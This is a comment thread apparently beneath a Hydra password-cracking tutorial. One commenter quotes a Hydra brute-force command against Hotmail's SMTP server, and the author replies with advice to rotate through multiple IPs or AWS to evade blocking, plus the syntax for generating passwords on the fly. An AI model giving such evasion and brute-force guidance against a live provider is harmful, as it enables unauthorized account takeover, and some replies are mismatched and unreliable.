  16. hello, I’m trying to recover the password of a very old email of mine, in fact I didn’t insert alternative ways to recover it, email made at the time of messenger with hotmail.it I tried to recover it with: Hydra -s 587 -S -O -V -l [email protected] -p rockyou.txt -t 32 smtp.live.com smtp
    but i don’t get results, right?
    I would like to try an attack without a password list, but let it be generated, how should I go about getting all possible characters?

    1. Hi Filippo

      Your not going to be able to run Hydra alone against hotmail accounts, they will just block your IP.

      You will have to proxy it through multiple IPs. Then, if one IP gets blocked you have already switched to a new one.

      Just google brute Forcing using AWS.

      In Hydra you can brute force without a password list by using the -x tag. However, this is a lot slower then using a good password list.

      -x MIN:MAX:CHARSET     
      MIN = Minimum number of characters
      MAX = Maximum number of characters
      CHARSET = specify a character set (a lowercase, A uppercase, 1 numbers and everything else use the actual character).

      hope this helps ?

      Hemp

        1. Hi Alex

          If You are not using a password list you need to use the -x command adding the minimum and maximum number of characters and the charset.

          so something like -x 2:5:a will generate passwords from length 2 to 5 with lowercase letters.

          If you need to find out more check out the help in hydra with hydra -x -h.

          Hope this helps.

          Hemp

  17. hi, at the sudo make install part, i just got error 127 saying there is no such file or directory. How can i fix this?

    1. Hi Jay_why5150

      No, hydra can only brute force passwords.

      I think you might be looking for a tool like Netcat, check out my tutorial for Netcat HERE

      Hemp

Leave a Reply

Your email address will not be published. Required fields are marked *

Scroll to top